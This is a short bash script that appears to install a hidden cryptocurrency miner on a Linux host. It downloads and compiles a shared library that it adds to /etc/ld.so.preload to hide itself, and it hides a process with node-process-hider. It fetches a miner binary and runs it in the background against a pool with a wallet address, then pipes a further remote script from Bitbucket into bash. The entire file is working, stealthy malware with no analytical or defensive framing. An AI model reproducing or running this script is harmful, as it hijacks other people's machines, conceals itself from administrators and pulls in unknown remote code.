#!/bin/bash
apt-get update ; apt-get install sudo -y
curl https://bitbucket.org/dennidarko01/kangkung/raw/master/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 1.1.1.1;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.3.1 -y && npm i -g node-process-hider && ph add sgr1"
mkdir .kap && cd .kap
wget -O sgr1 https://bitbucket.org/dennidarko01/kangkung/raw/master/xmolx >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 -a rx/0 -o 172.104.181.74:443 -u ZEPHYR3LE3NJVeJzgekCyChWdACWn6DHHW2SfzYhtXywDvdN1qA7WFY2DbzZN4zAC27CQFwqc7zvVMsFM42mytJr6CJPQk6cGm14a --rig-id $(echo $(shuf -i 1000-9999 -n 1)-GH) -p x@$(echo $(shuf -i 1000-9999 -n 1)-GH) -t $(nproc --all) --donate-level 1 -k > /dev/null 2>&1 &
curl -sL https://bitbucket.org/lightcoral2/cangor/raw/master/boled04.sh | bash 
